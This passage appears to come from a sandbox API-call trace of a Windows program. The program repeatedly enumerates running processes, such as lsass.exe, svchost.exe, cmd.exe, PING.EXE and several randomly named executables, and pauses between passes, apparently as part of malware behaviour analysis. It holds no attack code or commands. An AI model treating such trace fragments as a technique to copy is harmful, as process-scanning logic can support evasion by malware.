returned 1 [0102.783] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0102.784] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0102.785] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.786] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.787] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.788] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.789] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.790] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0102.790] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.791] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.792] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0102.829] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.830] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0102.832] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0102.833] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0102.834] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0102.835] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.836] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0102.837] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0102.839] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0102.840] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0102.841] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0102.842] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0102.843] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0102.845] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0102.846] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0102.847] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0102.848] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0102.849] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0102.850] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0102.852] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0102.853] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0102.854] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0102.855] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0102.856] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0102.857] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0102.858] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0102.859] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0102.860] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.861] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0102.862] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xae4, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0102.863] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0102.864] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb74, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0102.865] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0102.866] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbbc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0102.867] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0102.868] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xb88, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0102.913] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0102.915] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xbcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0102.916] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xbe8, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0102.917] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0102.919] CloseHandle (hObject=0xbc) returned 1 [0102.919] Sleep (dwMilliseconds=0x12c) [0103.281] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0103.286] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.287] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0103.287] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0103.288] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0103.289] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0103.289] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0103.290] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0103.291] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0103.291] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0103.292] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0103.293] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.293] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.294] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.294] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.295] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.296] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0103.296] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.297] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.298] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0103.299] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.300] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0103.301] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0103.302] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0103.303] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0103.305] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.306] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0103.307] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0103.308] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0103.309] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0103.310] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0103.311] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0103.313] Process32NextW 